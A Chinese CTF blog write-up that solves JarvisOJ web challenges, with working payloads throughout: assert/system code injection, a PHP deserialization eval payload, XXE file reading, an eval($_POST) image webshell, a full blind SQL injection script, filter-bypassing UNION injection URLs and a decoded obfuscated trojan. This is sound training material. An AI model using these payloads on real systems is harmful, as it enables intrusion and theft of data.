Chybeta

jarvisoj-web-writeup

jarvisoj-web-writeup

[61dctf]babyphp

以前做过。按理说应该有git泄露的..这次死活找不到:)
更新:平台给了hint说题目已经修复了,找到了:)
通过git泄露出来的index.php源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
?>

其中assert是个危险函数,其原型为

1
bool assert ( mixed $assertion [, string $description ] )

如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。
payload1:

1
http://web.jarvisoj.com:32798/?page=flag'.system("ls templates/;").'

payload2

1
http://web.jarvisoj.com:32798/?page=flag'.system("cat templates/flag.php;").'

得到flag:

1
61dctf{8e_careful_when_us1ng_ass4rt}

其实这是CSAW2016原题..

[61dctf]inject

1
2
http://web.jarvisoj.com:32794/
Hint1: 先找到源码再说吧~~

访问:http://web.jarvisoj.com:32794/index.php~,得到源代码:

1
2
3
4
5
6
7
8
9
<?php
require("config.php");
$table = $_GET['table']?$_GET['table']:"test";
$table = Filter($table);
mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{$table}";
$ret = sql_query($sql);
echo $ret[0];
?>

[61dctf]admin

扫到robots.txt发现Disallow: /admin_s3cr3t.php
访问并用burp抓包,如下:

在cookie字段加上admin=1,得到flag:

1
flag{hello_admin~}

WEB?

有一个check功能,输入错误的密码会提示“Wrong Password!!”,查看源代码,有个app.js。将该js文件格式化后在里面查找字符串“Wrong Password!!”,如下:

可以看到有个checkpass(e)函数,定位到该函数处。

1
2
3
4
r.checkpass = function() {
var e;
return (e = r).__checkpass__REACT_HOT_LOADER__.apply(e, arguments)
},

定位到 checkpassREACTHOTLOADER 处:

发现是一个线性方程组。

1
2
3
4
5
6
7
8
9
10
11
12
import numpy as np
from scipy.linalg import solve
import string
r = np.array([325799, 309234, 317320, 327895, 298316, 301249, 330242, 289290, 273446, 337687, 258725, 267444, 373557, 322237, 344478, 362136, 331815, 315157, 299242, 305418, 313569, 269307, 338319, 306491, 351259])
o = np.array([[11, 13, 32, 234, 236, 3, 72, 237, 122, 230, 157, 53, 7, 225, 193, 76, 142, 166, 11, 196, 194, 187, 152, 132, 135], [76, 55, 38, 70, 98, 244, 201, 125, 182, 123, 47, 86, 67, 19, 145, 12, 138, 149, 83, 178, 255, 122, 238, 187, 221], [218, 233, 17, 56, 151, 28, 150, 196, 79, 11, 150, 128, 52, 228, 189, 107, 219, 87, 90, 221, 45, 201, 14, 106, 230], [30, 50, 76, 94, 172, 61, 229, 109, 216, 12, 181, 231, 174, 236, 159, 128, 245, 52, 43, 11, 207, 145, 241, 196, 80], [134, 145, 36, 255, 13, 239, 212, 135, 85, 194, 200, 50, 170, 78, 51, 10, 232, 132, 60, 122, 117, 74, 117, 250, 45], [142, 221, 121, 56, 56, 120, 113, 143, 77, 190, 195, 133, 236, 111, 144, 65, 172, 74, 160, 1, 143, 242, 96, 70, 107], [229, 79, 167, 88, 165, 38, 108, 27, 75, 240, 116, 178, 165, 206, 156, 193, 86, 57, 148, 187, 161, 55, 134, 24, 249], [235, 175, 235, 169, 73, 125, 114, 6, 142, 162, 228, 157, 160, 66, 28, 167, 63, 41, 182, 55, 189, 56, 102, 31, 158], [37, 190, 169, 116, 172, 66, 9, 229, 188, 63, 138, 111, 245, 133, 22, 87, 25, 26, 106, 82, 211, 252, 57, 66, 98], [199, 48, 58, 221, 162, 57, 111, 70, 227, 126, 43, 143, 225, 85, 224, 141, 232, 141, 5, 233, 69, 70, 204, 155, 141], [212, 83, 219, 55, 132, 5, 153, 11, 0, 89, 134, 201, 255, 101, 22, 98, 215, 139, 0, 78, 165, 0, 126, 48, 119], [194, 156, 10, 212, 237, 112, 17, 158, 225, 227, 152, 121, 56, 10, 238, 74, 76, 66, 80, 31, 73, 10, 180, 45, 94], [110, 231, 82, 180, 109, 209, 239, 163, 30, 160, 60, 190, 97, 256, 141, 199, 3, 30, 235, 73, 225, 244, 141, 123, 208], [220, 248, 136, 245, 123, 82, 120, 65, 68, 136, 151, 173, 104, 107, 172, 148, 54, 218, 42, 233, 57, 115, 5, 50, 196], [190, 34, 140, 52, 160, 34, 201, 48, 214, 33, 219, 183, 224, 237, 157, 245, 1, 134, 13, 99, 212, 230, 243, 236, 40], [144, 246, 73, 161, 134, 112, 146, 212, 121, 43, 41, 174, 146, 78, 235, 202, 200, 90, 254, 216, 113, 25, 114, 232, 123], [158, 85, 116, 97, 145, 21, 105, 2, 256, 69, 21, 152, 155, 88, 11, 232, 146, 238, 170, 123, 135, 150, 161, 249, 236], [251, 96, 103, 188, 188, 8, 33, 39, 237, 63, 230, 128, 166, 130, 141, 112, 254, 234, 113, 250, 1, 89, 0, 135, 119], [192, 206, 73, 92, 174, 130, 164, 95, 21, 153, 82, 254, 20, 133, 56, 7, 163, 48, 7, 206, 51, 204, 136, 180, 196], [106, 63, 252, 202, 153, 6, 193, 146, 88, 118, 78, 58, 214, 168, 68, 128, 68, 35, 245, 144, 102, 20, 194, 207, 66], [154, 98, 219, 2, 13, 65, 131, 185, 27, 162, 214, 63, 238, 248, 38, 129, 170, 180, 181, 96, 165, 78, 121, 55, 214], [193, 94, 107, 45, 83, 56, 2, 41, 58, 169, 120, 58, 105, 178, 58, 217, 18, 93, 212, 74, 18, 217, 219, 89, 212], [164, 228, 5, 133, 175, 164, 37, 176, 94, 232, 82, 0, 47, 212, 107, 111, 97, 153, 119, 85, 147, 256, 130, 248, 235], [221, 178, 50, 49, 39, 215, 200, 188, 105, 101, 172, 133, 28, 88, 83, 32, 45, 13, 215, 204, 141, 226, 118, 233, 156], [236, 142, 87, 152, 97, 134, 54, 239, 49, 220, 233, 216, 13, 143, 145, 112, 217, 194, 114, 221, 150, 51, 136, 31, 198]])
x = solve(o,r)
flag = ""
for i in range(len(x)):
char = chr(int(round((x[i]))))
flag += char
print(flag)

得到flag:

1
QWB{R3ac7_1s_interesting}

PHPINFO

题目入口:http://web.jarvisoj.com:32784/
题目源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
public $mdzz;
function __construct()
{
$this->mdzz = 'phpinfo();';
}
function __destruct()
{
eval($this->mdzz);
}
}
if(isset($_GET['phpinfo']))
{
$m = new OowoO();
}
else
{
highlight_string(file_get_contents('index.php'));
}
?>

session.serialize_handler容易想到wooyun上的文章《PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患》。通过phpinfo页面,我们知道php.ini中默认session.serialize_handler为php_serialize,而index.php中将其设置为php。这就导致了seesion的反序列化问题。

由phpinfo()页面知,session.upload_progress.enabled为On。当一个上传在处理中,同时POST一个与INI中设置的session.upload_progress.name同名变量时,当PHP检测到这种POST请求时,它会在$_SESSION中添加一组数据。所以可以通过Session Upload Progress来设置session。可以看看这里:有趣的php反序列化总结

先把下面代码保存为test.html。

1
2
3
4
5
<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file" />
<input type="submit" />
</form>

接下来考虑序列化的问题。

1
2
3
4
5
6
7
8
9
10
11
<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
<?php
class OowoO
{
public $mdzz='xxxxx';
}
$obj = new OowoO();
echo serialize($obj);
?>

payloay1:将xxxxx替换为print_r(scandir(dirname(__FILE__)));,得到序列化结果:

1
O:5:"OowoO":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}

为防止转义,在引号前加上\。利用前面的html页面随便上传一个东西,抓包,把filename改为如下:

1
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}

注意,前面有一个|,这是session的格式。


接下来就是去读取 Here_1s_7he_fl4g_buT_You_Cannot_see.php
由phpinfo可知当前的路径为/opt/lampp/htdocs/

将xxx处改为:

1
print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));

之后步骤如前,将filename改为:

1
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}

得到flag:

1
CTF{4d96e37f4be998c50aa586de4ada354a}

api调用

《小试XML实体注入攻击》中已经提过。

抓包改包,将Content-Type改为application/xml,然后post数据如下:

1
2
3
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [<!ENTITY file SYSTEM "file:////home/ctf/flag.txt">]>
<root>&file;</root>

得到flag:

1
CTF{XxE_15_n0T_S7range_Enough}

Easy Gallery

随手测试一下功能,比如点开submit,或者view页面,他们的链接如下:

1
2
http://web.jarvisoj.com:32785/index.php?page=submit
http://web.jarvisoj.com:32785/index.php?page=submit

随便改个参数:

1
http://web.jarvisoj.com:32785/index.php?page=view%27

结果报错:

1
2
Warning: fopen(view'.php): failed to open stream: No such file or directory in /opt/lampp/htdocs/index.php on line 24
No such file!

所以这里应该有文件包含漏洞。结合submit的图片上传功能,可以猜想我们上传一个图片马,然后再去包含它。用edjpgcom制作图片,插入的一句话为:

1
<script language="php">@eval($_POST['c']);</script>

若是直接用<?php … ?>,会失败,应该是服务器端做了过滤。上传后得到id。之后通过view功能得到图片的地址为

1
http://web.jarvisoj.com:32785/uploads/1499355842.jpg

利用文件包含功能,加上%00截断绕过,访问:

1
2
http://web.jarvisoj.com:32785/index.php
?page=uploads/1499355842.jpg%00

得到flag:

1
CTF{upl0ad_sh0uld_n07_b3_a110wed}

Simple Injection

盲注。用户名处存在注入。根据是用户名错误还是密码错误来进行判断。过滤了空格,and,or。

  • 过滤空格,可以用tab键绕过 %09
  • 过滤or,可以用||来替代

附上exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
# -*- coding:utf-8 -*-
import requests
import string
import sys
global findBit
def sendPayload(payload):
proxy = {"http":"http://127.0.0.1:8080"}
url = "http://web.jarvisoj.com:32787/login.php"
# parm = {"username":payload,"password":"bb","submit":""}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
parm = "username="+payload+"&password=bb"
content = requests.post(url,data=parm,headers=headers,proxies=proxy)
return content.text
# def generatePayload():
cuowu = '\u7528\u6237\u540d\u9519\u8bef'.decode('unicode_escape')
# print cuowu
def generateTarget(flag):
if flag == "database":
return "database()"
elif flag == "tables":
return "(SELECT%09GROUP_CONCAT(table_name%09SEPARATOR%090x3c62723e)%09FROM%09INFORMATION_SCHEMA.TABLES%09WHERE%09TABLE_SCHEMA=0x696e6a656374696f6e)"
elif flag == "columns":
return "(SELECT%09GROUP_CONCAT(column_name%09SEPARATOR%090x3c62723e)%09FROM%09INFORMATION_SCHEMA.COLUMNS%09WHERE%09TABLE_NAME=0x61646d696e)"
elif flag == "data":
return "(SELECT%09GROUP_CONCAT(id,0x3a,username,0x3a,password%09SEPARATOR%090x3c62723e)%09FROM%09admin)"
def doubleSearch(leftNum,rightNum,i,target):
global findBit
midNum = (leftNum + rightNum) / 2
if (rightNum != leftNum +1):
payload = "a' || (ascii(substr("+generateTarget(target) +","+ str(i) +",1))<="+str(midNum) +")%23"
# print payload
recv = sendPayload(payload)
# print recv
if cuowu in recv:
# print 'cuowu'
# raw_input()
doubleSearch(midNum,rightNum,i,target)
else:
# print 'chenggong'
# raw_input()
doubleSearch(leftNum,midNum,i,target)
else:
if rightNum != 0:
# print rightNum
# raw_input()
sys.stdout.write(chr(rightNum))
sys.stdout.flush()
else:
findBit = 1
return
def exp():
global findBit
i = 1
findBit = 0
print "The database:"
target = "database"
while i :
doubleSearch(-1,255,i,target)
i += 1
if findBit == 1:
sys.stdout.write("\r\n")
break
i = 1
findBit = 0
print "The tables:"
target = "tables"
while i :
doubleSearch(-1,255,i,target)
i += 1
if findBit == 1:
sys.stdout.write("\r\n")
break
i = 1
findBit = 0
print "The columns:"
target = "columns"
while i :
doubleSearch(-1,255,i,target)
i += 1
if findBit == 1:
sys.stdout.write("\r\n")
break
i = 1
findBit = 0
print "The data:"
target = "data"
while i :
doubleSearch(-1,255,i,target)
i += 1
if findBit == 1:
sys.stdout.write("\r\n")
break
exp()

密码进行md5解密:

1
334cfb59c9d74849801d5acdcfdaadc3 => eTAloCrEP

最后flag:

1
CTF{s1mpl3_1nJ3ction_very_easy!!}

Chopper

题目地址:http://web.jarvisoj.com:32782/
题目描述:小明入侵了一台web服务器并上传了一句话木马,但是,管理员修补了漏洞,更改了权限。更重要的是:他忘记了木马的密码!你能帮助他夺回控制权限吗?

查看源代码,图片的插入方式比较奇怪,如下:

1
http://web.jarvisoj.com:32782/proxy.php?url=http://dn.jarvisoj.com/static/images/proxy.jpg

点击管理员登陆

1
http://web.jarvisoj.com:32782/admin

查看源代码得到提示:

1
<!--<script>alert('admin ip is 103.27.76.153')</script>-->

结合前面图片的插入方式,我们构造下面链接访问:

1
http://web.jarvisoj.com:32782/proxy.php?url=http://103.27.76.153/proxy.php?url=http://web.jarvisoj.com:32782/admin/

通过扫描器知admin目录下有robots.txt,内容如下:

1
2
3
User-agent: *
Disallow:trojan.php
Disallow:trojan.php.txt

其中trojan.php.txt的内容是:

1
<?php ${("#"^"|").("#"^"|")}=("!"^"`").("( "^"{").("("^"[").("~"^";").("|"^".").("*"^"~");${("#"^"|").("#"^"|")}(("-"^"H"). ("]"^"+"). ("["^":"). (","^"@"). ("}"^"U"). ("e"^"A"). ("("^"w").("j"^":"). ("i"^"&"). ("#"^"p"). (">"^"j"). ("!"^"z"). ("T"^"g"). ("e"^"S"). ("_"^"o"). ("?"^"b"). ("]"^"t"));?>

上述代码保存为php页面运行一下,得到Warning:

1
Warning: assert() [function.assert]: Assertion "eval($_POST[360])" failed in C:\phpstudy\WWW\b.php on line 1

所以,webshell密码为360。

最后flag:

1
CTF{fl4g_1s_my_c40d40_1s_n0t_y0urs}

RE?

题目如下

1
咦,奇怪,说好的WEB题呢,怎么成逆向了?不过里面有个help_me函数挺有意思的哦

下载下来后文件名为udf.so.XXXXX,用mysql导入一下。具体过程如下。
将udf文件放到/usr/lib/mysql/plugin/文件夹中:

1
root@0e5b63de05fd:/usr/lib/mysql/plugin# wget https://dn.jarvisoj.com/challengefiles/udf.so.02f8981200697e5eeb661e64797fc172

登陆mysql后,加载help_me函数:

1
2
mysql> create function help_me returns string soname 'udf.so.02f8981200697e5eeb661e64797fc172';
Query OK, 0 rows affected (2.04 sec)

利用help_me函数:

1
2
3
4
5
6
7
8
mysql> select help_me();
+---------------------------------------------+
| help_me() |
+---------------------------------------------+
| use getflag function to obtain your flag!!
|
+---------------------------------------------+
1 row in set (0.17 sec)

利用udf再创建一个getflag函数。

1
2
mysql> create function getflag returns string soname 'udf.so.02f8981200697e5eeb661e64797fc172';
Query OK, 0 rows affected (0.05 sec)

得到flag:

1
2
3
4
5
6
7
8
mysql> select getflag();
+------------------------------------------+
| getflag() |
+------------------------------------------+
| PCTF{Interesting_U5er_d3fined_Function}
|
+------------------------------------------+
1 row in set (0.00 sec)

IN A mess

题目地址:http://web.jarvisoj.com:32780/index.php?id=1

访问并查看源代码,发现提示:

1
<!--index.phps-->work harder!harder!harder

访问index.phps,得到源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
error_reporting(0);
echo "<!--index.phps-->";
if(!$_GET['id'])
{
header('Location: index.php?id=1');
exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
echo 'Hahahahahaha';
return ;
}
$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
require("flag.txt");
}
else
{
print "work harder!harder!harder!";
}
?>

php弱类型绕过。当$a为php://input,$data可以通过php://input来接受post数据。$id传一个字符进去,会被转换为0。对$b,要求长度大于5,其次要求满足eregi的要求和首字母不为4。可以设置$b%00111111,这样,substr()会发生截断,在匹配时时进行eregi(“111”,”1114”)满足,同时%00对strlen不会发生截断。

访问:

1
http://web.jarvisoj.com:32780/^HT2mCpcvOLf

发现链接自动补全,如下:

1
http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=1

猜测是注入。注入过程如下:

1
http://web.jarvisoj.com:32780/^HT2mCpcvOLf/index.php?id=0/*123*/ununionion/*123*/selselectect/*123*/1,2,3#

字段数为3。

1
http://web.jarvisoj.com:32780/^HT2mCpcvOLf/index.php?id=0/*123*/ununionion/*123*/selselectect/*123*/1,2,database()#

得到数据库名:test

1
http://web.jarvisoj.com:32780/^HT2mCpcvOLf/index.php?id=0/*1*/ununionion/*1*/selselectect/*1*/1,2,group_concat(table_name)/*1*/frofromm/*1*/information_schema.tables/*1*/where/*1*/table_schema=0x74657374#

得到表名:content

1
http://web.jarvisoj.com:32780/^HT2mCpcvOLf/index.php?id=0/*1*/ununionion/*1*/selselectect/*1*/1,2,group_concat(column_name)/*1*/frofromm/*1*/information_schema.columns/*1*/where/*1*/table_name=0x636f6e74656e74#

得到字段名:id,context,title

1
http://web.jarvisoj.com:32780/^HT2mCpcvOLf/index.php?id=0/*123*/uniunionon/*123*/selselectect/*123*/1,2,group_concat(id,0x3a,context,0x3a,title,0x3a)/*123*/frfromom/*111*/content#

得到flag:

1
PCTF{Fin4lly_U_got_i7_C0ngRatulation5}

神盾局的秘密

打开页面后查看源代码,发现插入图片的位置处是base64加密结果。

1
<img src="showimg.php?img=c2hpZWxkLmpwZw==" width="100%"/>

index.php经base64加密后得到aW5kZXgucGhw尝试访问:

1
http://web.jarvisoj.com:32768/showimg.php?img=aW5kZXgucGhw

得到index.php源码:

1
2
3
4
5
6
7
8
9
<?php
require_once('shield.php');
$x = new Shield();
isset($_GET['class']) && $g = $_GET['class'];
if (!empty($g)) {
$x = unserialize($g);
}
echo $x->readfile();
?>

看到里面有个shield.php,尝试用前面的套路去读取:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
//flag is in pctf.php
class Shield {
public $file;
function __construct($filename = '') {
$this -> file = $filename;
}
function readfile() {
if (!empty($this->file) && stripos($this->file,'..')===FALSE
&& stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
return @file_get_contents($this->file);
}
}
}
?>

用以下脚本生成序列化串O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}

1
2
3
4
5
6
7
<?php
class Shield {
public $file = "pctf.php";
}
$chybeta = new Shield();
print_r(serialize($chybeta));
?>

访问

1
http://web.jarvisoj.com:32768/index.php?class=O:6:%22Shield%22:1:{s:4:%22file%22;s:8:%22pctf.php%22;}

查看源代码,得到flag:

1
PCTF{W3lcome_To_Shi3ld_secret_Ar3a}

顺便附上showimg.php的源码:

1
2
3
4
5
6
7
8
9
10
11
12
<?php
$f = $_GET['img'];
if (!empty($f)) {
$f = base64_decode($f);
if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE
&& stripos($f,'pctf')===FALSE) {
readfile($f);
} else {
echo "File not found!";
}
}
?>

Login

随便填一个密码。抓包得到提示:

要注入下列sql语句:

1
"select * from `admin` where password='".md5($pass,true)."'"

关键在md5($pass,true),若$pass的值为ffifdyop,则经过md5转换后的值再经过php转为字符串后会变成'or'6蒥欓!r,b,6的后面是一堆乱七八糟的字符,姑且记为xx吧。则最后的sql查询语句为:

1
select * from `admin` where password=''or'6蒥欓!r,b'

成功闭合前面的单引号。填入password,得到flag:

1
PCTF{R4w_md5_is_d4ng3rous}

更多内容可见:SQL injection with raw MD5 hashes

LOCALHOST

直接改X-Forwarded-For为127.0.0.1。得到flag:

1
PCTF{X_F0rw4rd_F0R_is_not_s3cuRe}

PORT 51

用vps来请求,不然经过路由后可能请求端口就变了。在vps上:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
ubuntu@VM-207-93-ubuntu:~$ sudo curl --local-port 51 http://web.jarvisoj.com:32770/
[sudo] password for ubuntu:
<!DOCTYPE html>
<html>
<head>
<title>Web 100</title>
<style type="text/css">
body {
background:gray;
text-align:center;
}
</style>
</head>
<body>
<h3>Yeah!! Here's your flag:PCTF{M45t3r_oF_CuRl}</h3>
</body>
</html>

flag:

1
PCTF{M45t3r_oF_CuRl}

点击赞赏二维码,您的支持将鼓励我继续创作!
chybeta WeChat Pay

微信打赏

chybeta Alipay

支付宝打赏

本文标题:jarvisoj-web-writeup

文章作者:chybeta

发布时间:2017年07月05日 - 22:07

最后更新:2017年08月02日 - 18:08

原始链接:http://chybeta.github.io/2017/07/05/jarvisoj-web-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。